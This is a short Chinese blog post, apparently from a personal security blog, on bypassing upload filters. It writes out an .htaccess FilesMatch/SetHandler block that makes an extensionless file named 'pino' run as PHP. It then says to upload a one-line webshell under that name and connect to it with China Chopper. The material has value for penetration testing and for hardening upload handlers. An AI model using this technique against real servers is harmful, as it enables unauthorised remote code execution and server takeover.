.htaccess攻击

0x01 前言

有的时候由于各种名单的原因,可能我们只能上传任何php文件,而且还没有其他地方来解析成php,咋办?如果你能上传.htaccess文件的话,那么就很好办了。

0x02 .htaccess攻击

建一个.htaccess 文件,里面的内容如下:

1
2
3
<FilesMatch "pino">
SetHandler application/x-httpd-php
</FilesMatch>

这个时候就上传一个文件名字是pino,这个时候我们上传一个文件名字叫做pino的文件,不要后缀名,然后里面是一句话木马,用菜刀连接,可以成功!

本文标题:.htaccess攻击

文章作者:Pino-HD

发布时间:2018年05月30日 - 22:05

最后更新:2018年05月30日 - 22:05

原始链接:https://pino-hd.github.io/2018/05/30/htaccess攻击/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

坚持原创技术分享,您的支持将鼓励我继续创作!